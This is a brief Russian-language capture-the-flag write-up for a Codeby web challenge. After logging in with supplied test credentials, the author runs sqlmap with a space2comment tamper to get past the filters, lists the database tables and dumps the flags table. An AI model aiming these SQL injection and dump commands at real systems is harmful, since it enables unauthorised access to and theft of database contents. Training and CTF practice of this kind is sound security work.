Автор: @Vespii

Ссылка на таск Codeby:

https://codeby.games/categories/web/24975f4e-cd03-4fee-a511-b7477ac4458c

Описание задания

Я решил переделать свой прошлый проект и переписал его на PHP, а также добавил защитные фильтры.

Держи тестовые креды:
login=test, password=test.

62.173.140.174:16015

Решение

На web сайте присутствует форма авторизации

Зайдем с помощью кредов test:test. Ничего интересного

В коде элемента видим запрос к базе данных

Запустим sqlmap:

sqlmap -u 'http://62.173.140.174:16015/user.php?login=test&password=test' --batch --tables --risk 3 --level 3 --tamper=space2comment

Утилита вывела таблицы. Нас интересует flags

Выведем все из таблицы flags

sqlmap -u 'http://62.173.140.174:16015/user.php?login=test&password=test' --batch --tables --risk 3 --level 3 --tamper=space2comment -T flags --dump

Tags:

#codeby#writeup#web#medium